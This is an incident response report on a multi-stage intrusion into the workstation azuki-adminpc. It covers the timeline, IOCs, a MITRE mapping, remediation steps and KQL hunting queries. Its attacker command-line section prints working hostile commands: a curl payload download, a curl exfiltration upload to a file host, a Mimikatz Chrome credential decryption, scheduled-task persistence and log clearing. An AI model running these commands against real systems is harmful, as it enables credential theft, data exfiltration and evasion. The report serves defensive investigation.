Incident Response Report
Azuki Import/Export
Multi-Stage Intrusion — AZUKI-ADMINPC
Multi-Stage Intrusion — AZUKI-ADMINPC
AZUKI-IR-2025-1124-ADMINPC · Credential Theft & Data Exfiltration · 2025-11-24
01
Executive Summary
Microsoft Sentinel telemetry indicates a confirmed, operator-driven intrusion impacting the workstation azuki-adminpc. The attacker leveraged compromised credentials for interactive access, deployed a Meterpreter-based C2 implant, performed targeted discovery, staged sensitive business and credential data, and exfiltrated multiple archives to an external file hosting service.
The activity demonstrates both credential access and collection objectives: browser credential and session extraction (Chrome DPAPI decryption) and theft of financial/business datasets (tax records, contracts, QuickBooks, and banking files). Persistence was established via creation of a new local administrator account and a scheduled task designed to blend with legitimate Windows security components. The attacker also executed log-clearing commands consistent with defence evasion.
02
WHO
- Threat actor: Unknown — tradecraft consistent with hands-on-keyboard intrusion using common offensive tooling.
- Primary compromised endpoint: azuki-adminpc.
- Internal beachhead / pivot host: azuki-sl (10.1.0.204) used to access azuki-adminpc.
- Additional internal target: azuki-fileserver01 (10.1.0.188) — received remote execution attempts via PsExec.
- Compromised user: yuki.tanaka — used for interactive discovery and tooling execution.
- Backdoor account created: yuki.tanaka2 — added to local Administrators.
03
WHAT
- Interactive access to azuki-adminpc from 10.1.0.204 using yuki.tanaka, followed by rapid discovery activity.
- Deployment and execution of a Meterpreter implant (meterpreter.exe) with C2 indicators including named pipe creation (
msf-pipe-5902). - Domain and session discovery: enumeration of RDP sessions (qwinsta/quser), domain trusts (nltest), and network connections (netstat -ano).
- Credential hunting: recursive search for KeePass databases (*.kdbx) and discovery of a plaintext master password file (KeePass-Master-Password.txt), plus an additional password artefact (OLD-Passwords.lnk).
- Browser credential theft using Mimikatz DPAPI modules to decrypt Chrome saved logins and cookies; outputs archived for exfiltration.
- Local data staging under a deceptive Windows-like path (
C:\ProgramData\Microsoft\Crypto\staging) and creation of 8 business-data archives for theft. - Exfiltration using curl form-based uploads (HTTP POST) to store1.gofile.io.
- Persistence and defence evasion: creation of a backdoor local admin (yuki.tanaka2) via base64-obfuscated PowerShell; scheduled task persistence; PowerShell log clearing via wevtutil.
- Lateral movement attempts: retrieval and use of Sysinternals PsExec to push a secondary payload (silentlynx.exe) to internal hosts over ADMIN$ shares.
04
WHEN
Key activity timeline (UTC):
2025-11-24 15:10:09Initial interactive logon to azuki-adminpc from 10.1.0.204 (azuki-sl) using compromised account yuki.tanaka.
2025-11-25 04:08:58RDP session enumeration executed (
qwinsta.exe / quser.exe) — hands-on-keyboard discovery.2025-11-25 04:09:25Domain trust enumeration via
nltest.exe /domain_trusts /all_trusts.2025-11-25 04:10:07Network connection enumeration via
NETSTAT.EXE -ano.2025-11-25 04:13:45Password database search:
where /r C:\Users *.kdbx.2025-11-25 04:21:11curl downloaded masqueraded archive
KB5044273-x64.7z from litter.catbox.moe into C:\Windows\Temp\cache.2025-11-25 04:24:35Named pipe
\Device\NamedPipe\msf-pipe-5902 created — consistent with Meterpreter C2 activity.2025-11-25 04:38:01 – 04:40:30Data collection and staging: robocopy created ZIP archives; tar created multiple tar.gz archives under
C:\ProgramData\Microsoft\Crypto\staging.2025-11-25 04:41:51 – 04:49:20Exfiltration via curl POST uploads of staged archives to store1.gofile.io/uploadFile.
2025-11-25 05:55:34Downloaded m-temp.7z; extracted m.exe (Mimikatz) to perform Chrome credential/cookie decryption via DPAPI.
2025-11-25 05:56:50Exfiltration of chrome-session-theft.tar.gz following cookie/session collection.
2025-11-25 05:58:27 – 06:10:41PsExec64.exe dropped then used to push silentlynx.exe to 10.1.0.188 and 10.1.0.204 via ADMIN$ shares.
2025-11-25 06:05:01Ransom note artefacts created (SILENTLYNX_README.txt) in user Desktop and Documents directories.
05
WHERE
Hosts
| Host | IP | Role |
|---|---|---|
| azuki-adminpc | — | Primary compromised workstation; execution, staging, and exfiltration host |
| azuki-sl | 10.1.0.204 | Compromised internal beachhead used to pivot into azuki-adminpc |
| azuki-fileserver01 | 10.1.0.188 | Internal file server targeted for payload distribution via PsExec |
Key Paths
C:\Windows\Temp\cache— Short-lived tool drop location (downloads, unpacking)C:\ProgramData\Microsoft\Crypto\staging— Main local data-staging directory\\10.1.0.188\ADMIN$— Lateral movement target (azuki-fileserver01)\\10.1.0.204\ADMIN$— Lateral movement target (azuki-sl)
External Infrastructure
| Domain / IP | Role |
|---|---|
| litter.catbox.moe / 108.181.20.36 | Payload hosting — archive downloads (.7z) via HTTPS/443 |
| store1.gofile.io / 45.112.123.227 | Exfiltration endpoint — form-based uploads via HTTPS/443 |
| live.sysinternals.com / 172.179.214.166 | PsExec retrieval — legitimate Microsoft Sysinternals site |
06
WHY
The observed collection and exfiltration prioritised credential material and business/financial datasets. Chrome credential and session theft provides immediate account takeover opportunities, while staged archives (tax records, contracts, QuickBooks, banking records, and credential sets) suggest financial fraud, business espionage, or follow-on extortion. Persistence mechanisms (local admin backdoor + scheduled task) indicate intent to maintain access beyond the initial intrusion window. Creation of SILENTLYNX_README.txt raises ransomware/extortion risk, even if encryption was not directly observed in the available telemetry.
07
HOW
Initial Access + Pivot
- The attacker used an already-compromised internal system (azuki-sl, 10.1.0.204) to access azuki-adminpc with stolen credentials (yuki.tanaka).
Tool Delivery
- Using native utilities, the actor downloaded archives from an external hosting service into
C:\Windows\Temp\cacheand extracted payloads with 7z.
Command and Control
- A Meterpreter implant executed on azuki-adminpc; behavioural evidence includes creation of named pipe
\Device\NamedPipe\msf-pipe-5902(commonly associated with Metasploit/Meterpreter IPC).
Discovery
- The actor enumerated interactive sessions (qwinsta/quser), domain trust relationships (nltest), and active network connections with owning processes (netstat -ano).
Credential Access
- The actor searched for password databases (*.kdbx) and obtained a plaintext KeePass master password file. In parallel, Mimikatz (m.exe) was used to decrypt Chrome credentials and cookies via DPAPI (
dpapi::chrome), enabling theft of saved passwords and session tokens.
Collection + Staging
- Business data was copied into a disguised staging directory (
C:\ProgramData\Microsoft\Crypto\staging). The actor created multiple ZIP and tar.gz archives to prepare for bulk exfiltration.
Exfiltration
- The actor uploaded archives using curl with multipart/form-data POST requests to store1.gofile.io/uploadFile. The first observed archive uploaded was credentials.tar.gz.
Persistence + Defence Evasion
- The actor created a backdoor local administrator (yuki.tanaka2) via base64-obfuscated PowerShell commands, established scheduled-task persistence (
Microsoft\Windows\Security\SecurityHealthService), and attempted to reduce telemetry by clearing PowerShell-related logs with wevtutil.
Lateral Movement
- PsExec was downloaded from live.sysinternals.com and used to execute / push silentlynx.exe to additional internal hosts over ADMIN$ shares.
08
IMPACT
Confirmed theft preparation and exfiltration of at least 8 staged business-data archives, plus separate Chrome credential/session theft archives. This materially increases the likelihood of account compromise (browser-saved credentials, session tokens) and broader organisational compromise (KeePass master password exposure).
If used, the backdoor administrator account (yuki.tanaka2) could provide continued access after password resets. The creation of SILENTLYNX_README.txt suggests the presence of a disruptive/extortion payload and raises ransomware/extortion risk, even if encryption was not directly observed in available telemetry.
Risk: CRITICALMultiple confirmed exfiltration events, credential dumping, backdoor account, and extortion payload artefacts — environment must be treated as fully compromised until remediation is complete.
09
THREAT INTELLIGENCE
The intrusion leveraged widely used offensive and dual-use tooling. No attribution to a named threat actor has been made; tradecraft is consistent with financially motivated hands-on-keyboard operators.
Tooling Observed
- Meterpreter (Metasploit framework) — named pipe msf-pipe-5902 as behavioural indicator.
- Mimikatz — DPAPI-based Chrome credential decryption (
dpapi::chrome). - Living-off-the-land utilities — curl, tar, netstat, nltest, qwinsta/quser, wevtutil, robocopy.
- Sysinternals PsExec — remote execution and payload distribution to internal hosts.
MITRE ATT&CK Mapping
| Technique | ID |
|---|---|
| Valid Accounts | T1078 |
| Windows Command Shell | T1059.003 |
| PowerShell | T1059.001 |
| Ingress Tool Transfer | T1105 |
| Obfuscated/Compressed Files | T1027 |
| System Owner/User Discovery | T1033 |
| Domain Trust Discovery | T1482 |
| System Network Connections Discovery | T1049 |
| Unsecured Credentials: Credentials In Files | T1552.001 |
| Credentials from Web Browsers | T1555.003 |
| Local Data Staging | T1074.001 |
| Archive Collected Data | T1560.001 |
| Exfiltration Over Web Service | T1567 / T1567.002 |
| Scheduled Task/Job | T1053.005 |
| Indicator Removal | T1070 |
10
OBSERVED IOCs
Host and Account Indicators
| Indicator | Type | Notes |
|---|---|---|
| azuki-adminpc | Host | Primary compromised workstation |
| azuki-sl (10.1.0.204) | Host | Internal beachhead used for pivot |
| azuki-fileserver01 (10.1.0.188) | Host | PsExec lateral movement target |
| yuki.tanaka | Account | Compromised user — interactive access and execution |
| yuki.tanaka2 | Account | Backdoor local admin created by attacker |
| kenji.sato | Account | Credential observed in PsExec command to 10.1.0.204 |
| fileadmin | Account | Credential observed in PsExec command to 10.1.0.188 |
Network Indicators
| Domain / IP | Role |
|---|---|
| litter.catbox.moe | Payload hosting (archive downloads) |
| 108.181.20.36 | Resolved IP — litter.catbox.moe (HTTPS/443) |
| store1.gofile.io | Exfiltration endpoint (form-based uploads) |
| 45.112.123.227 | Resolved IP — store1.gofile.io (HTTPS/443) |
| live.sysinternals.com | PsExec retrieval (legitimate, abused) |
| 172.179.214.166 | Resolved IP — live.sysinternals.com (HTTPS/443) |
File / Tooling Indicators
| Filename | Path | SHA-256 |
|---|---|---|
| KB5044273-x64.7z | C:\Windows\Temp\cache\ | c8ff861a52e85c9bfa2735f16c9f428c9de446e7295f2c5d3e6c194a4d322fb2 |
| meterpreter.exe | C:\Windows\Temp\cache\ | 24373ce25d981b2b9b1d1e8390b2122f7557118f4c9c74096bcfb1bd60b9bb83 |
| m-temp.7z | C:\Windows\Temp\cache\ | 8e5bd50f4db7b6114232defb471d32b17e117fccc4fa36d467531e4b5c2102ef |
| m.exe | C:\Windows\Temp\cache\ | 61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1 |
| chrome-credentials.tar.gz | C:\Windows\Temp\cache\ | 664af795cbb5f7f1a57d8fe537c1aa1fc56b9d7ed0e6d2cc139d57127b6631e1 |
| chrome-session-theft.tar.gz | C:\Windows\Temp\cache\ | b5dcae00375318ab3c31c59a67a8d25eaa14c173da1783951a9f82bb0ae7dbe4 |
| PsExec64.exe | C:\Windows\Temp\cache\ | edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef |
| silentlynx.exe | C:\Windows\Temp\cache\ + ADMIN$ copies | ba9ee9747a60b34e6099ceb2f51a95b748a4f34d2114b5171756e8ae55f688ec |
Persistence / Behavioural Indicators
- Scheduled task:
Microsoft\Windows\Security\SecurityHealthService(onlogon, highest privileges) executingC:\Windows\Temp\cache\silentlynx.exe - Named pipe:
\Device\NamedPipe\msf-pipe-5902 - Backdoor local admin: yuki.tanaka2 (created and added to Administrators)
Key Attacker Command Lines (Selected)
where /r C:\Users *.kdbxNETSTAT.EXE -anonltest.exe /domain_trusts /all_trustscurl.exe -L -o C:\Windows\Temp\cache\KB5044273-x64.7z https://litter.catbox.moe/gfdb9v.7zcurl.exe -X POST -F [email protected] https://store1.gofile.io/uploadFilem.exe privilege::debug "dpapi::chrome /in:%localappdata%\Google\Chrome\User Data\Default\Login Data /unprotect" exitschtasks /create /tn "Microsoft\Windows\Security\SecurityHealthService" /tr "C:\Windows\Temp\cache\silentlynx.exe" /sc onlogon /rl highest /fwevtutil cl "Microsoft-Windows-PowerShell/Operational"wevtutil.exe cl "Windows PowerShell"robocopy.exe /s /r:3 /w:5 "C:\Users\yuki.tanaka\Documents\Banking" "C:\ProgramData\Microsoft\Crypto\staging\Banking"tar.exe -czf credentials.tar.gz Master-Passwords.kdbx KeePass-Master-Password.txttar.exe -czf banking-records.tar.gz Banking
11
RECOMMENDATIONS
Immediate
- Isolate azuki-adminpc immediately; block outbound connections to litter.catbox.moe and store1.gofile.io at egress controls; temporarily block associated IPs pending validation.
- Force-reset passwords for yuki.tanaka, kenji.sato, fileadmin, and any other accounts used from azuki-adminpc; invalidate browser sessions where feasible; rotate any credentials stored in KeePass affected by the exposed master password.
- Remove the backdoor account yuki.tanaka2; delete the scheduled task
Microsoft\Windows\Security\SecurityHealthService; hunt for additional scheduled tasks/services/autoruns created during the window. - Remove malicious binaries and archives from
C:\Windows\Temp\cacheandC:\ProgramData\Microsoft\Crypto\staging; check for PsExec service artefacts (PSEXESVC) and ADMIN$ drop traces on 10.1.0.188 and 10.1.0.204.
Short-Term (24–48 Hours)
- Alert on curl.exe executing external downloads/uploads, tar/7z used in Temp directories, Mimikatz command-line patterns (dpapi::chrome), wevtutil log clears, and new local admin creation (
net user /add+localgroup Administrators). - Hunt enterprise-wide for the named pipe pattern
msf-pipe-and for the staging pathC:\ProgramData\Microsoft\Crypto\staging. - Review sign-in logs for yuki.tanaka and yuki.tanaka2 across all reachable systems.
Long-Term (1–4 Weeks)
- Perform full memory and disk acquisition from azuki-adminpc where available.
- Implement EDR with behavioural analysis to detect DPAPI abuse and named pipe C2 patterns.
- Restrict ADMIN$ share access and monitor for PsExec-style remote service creation on internal hosts.
- Enforce MFA for all privileged and remote access accounts to limit credential reuse risk.
12
KQL QUERIES
Q01 — Successful logons across Azuki hosts (entry + pivots)
DeviceLogonEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-12-01))
| where DeviceName has "azuki"
| where ActionType == "LogonSuccess"
| where LogonType in ("RemoteInteractive", "Network")
| summarize
FirstSeen=min(TimeGenerated),
LastSeen=max(TimeGenerated),
Logons=count()
by DeviceName, AccountName, LogonType, RemoteIP, RemoteIPType
| order by FirstSeen asc
Q02 — Map internal IPs to devices (quick identity pivot)
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-25))
| where LocalIP in ("10.0.8.4","10.0.8.9","10.1.0.204","10.1.0.188")
| project TimeGenerated, DeviceName, LocalIP
| order by TimeGenerated asc
Q03 — High-signal process activity on azuki-adminpc
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ProcessCommandLine has_any ("powershell", "certutil", "curl", "schtasks", "wevtutil",
"nltest", "netstat", "quser", "qwinsta", "where /r", "psexec", "7z", "tar", "m.exe")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q04 — Tooling drops in Windows Temp cache
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where FolderPath has @"C:\Windows\Temp\cache"
| where FileName in ("KB5044273-x64.7z","m-temp.7z","m.exe","meterpreter.exe",
"silentlynx.exe","chrome-credentials.tar.gz","chrome-session-theft.tar.gz","PsExec64.exe")
| project TimeGenerated, ActionType, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
Q05 — Named pipe creation (C2/implant behavioural indicator)
DeviceEvents | where TimeGenerated between (datetime(2025-11-25 04:00:00) .. datetime(2025-11-25 07:00:00)) | where DeviceName == "azuki-adminpc" | where ActionType == "NamedPipeEvent" | extend PipeName = tostring(parse_json(AdditionalFields).PipeName) | project TimeGenerated, DeviceName, ActionType, PipeName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine | order by TimeGenerated asc
Q06 — RDP session enumeration (interactive discovery)
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ProcessCommandLine has_any ("quser", "query user", "qwinsta", "query session")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q07 — Domain trust enumeration (nltest)
DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName == "azuki-adminpc" | where ProcessCommandLine has "nltest" | project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by TimeGenerated asc
Q08 — Network connection enumeration (netstat -ano)
DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName == "azuki-adminpc" | where ProcessCommandLine has "netstat" | project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by TimeGenerated asc
Q09 — Password database search (KeePass .kdbx discovery)
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ProcessCommandLine has_any ("dir", "find", "findstr", "forfiles", "where /r")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q10 — Desktop/Documents file activity (user data + creds-in-files)
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where FolderPath has_any ("Desktop","Documents")
| project TimeGenerated, ActionType, FileName, FolderPath, InitiatingProcessFileName
| order by TimeGenerated asc
Q11 — Hunt for credential-file naming patterns under user profiles
DeviceFileEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where FolderPath has @"C:\Users"
| where FileName has_any ("pass", "password", "cred", "login", "account", "secret", "vpn", "bank", "keepass")
| project TimeGenerated, ActionType, FileName, FolderPath, InitiatingProcessFileName
| order by TimeGenerated asc
Q12 — Staging directory — archives prepared for exfil
DeviceFileEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName == "azuki-adminpc" | where ActionType == "FileCreated" | where FolderPath startswith @"C:\ProgramData\Microsoft\Crypto\staging" | where FileName endswith ".zip" or FileName endswith ".7z" or FileName endswith ".tar.gz" | project TimeGenerated, FolderPath, FileName, InitiatingProcessFileName, InitiatingProcessCommandLine | order by TimeGenerated asc
Q13 — Collection movement into staging (robocopy)
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ProcessCommandLine has_any ("robocopy", "xcopy")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q14 — Exfil commands (HTTP POST uploads) + download activity
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ProcessCommandLine has_any ("curl.exe", "certutil", "http", "uploadFile", "-X POST", "-F file=@")
| project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
Q15 — Browser credential theft (m.exe / DPAPI chrome module)
DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName == "azuki-adminpc" | where ProcessCommandLine has "m.exe" | project TimeGenerated, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by TimeGenerated asc
Q16 — Exfil destination infrastructure (resolve RemoteIP for uploads)
DeviceNetworkEvents
| where TimeGenerated between (datetime(2025-11-25 04:00:00) .. datetime(2025-11-25 07:00:00))
| where DeviceName == "azuki-adminpc"
| where InitiatingProcessFileName in~ ("curl.exe", "powershell.exe")
| project TimeGenerated, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| order by TimeGenerated asc
Q17 — Master password file discovery (expanded window)
DeviceFileEvents | where TimeGenerated between (datetime(2025-11-19) .. datetime(2025-12-25)) | where DeviceName == "azuki-adminpc" | where ActionType == "FileCreated" | where FileName endswith ".txt" | project TimeGenerated, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine | order by TimeGenerated asc
13
APPENDIX
A — Staged Archives (Business Data)
Staging directory: C:\ProgramData\Microsoft\Crypto\staging
C:\ProgramData\Microsoft\Crypto\staging\credentials.tar.gzC:\ProgramData\Microsoft\Crypto\staging\quickbooks-data.tar.gzC:\ProgramData\Microsoft\Crypto\staging\banking-records.tar.gzC:\ProgramData\Microsoft\Crypto\staging\tax-documents.tar.gzC:\ProgramData\Microsoft\Crypto\staging\contracts-data.tar.gzC:\ProgramData\Microsoft\Crypto\staging\Contracts\Archive\All-Contracts-2022.zipC:\ProgramData\Microsoft\Crypto\staging\Contracts\Archive\All-Contracts-2023.zipC:\ProgramData\Microsoft\Crypto\staging\Tax-Records\Tax-Supporting-Docs-2024.zip
B — Credential Artefacts Discovered
- Password artefact (link):
OLD-Passwords.lnk - Plaintext master password file:
KeePass-Master-Password.txt
CONFIDENTIAL
Azuki — Multi-Stage Intrusion & Data Exfiltration · Yousef Nabil · 2026-02-19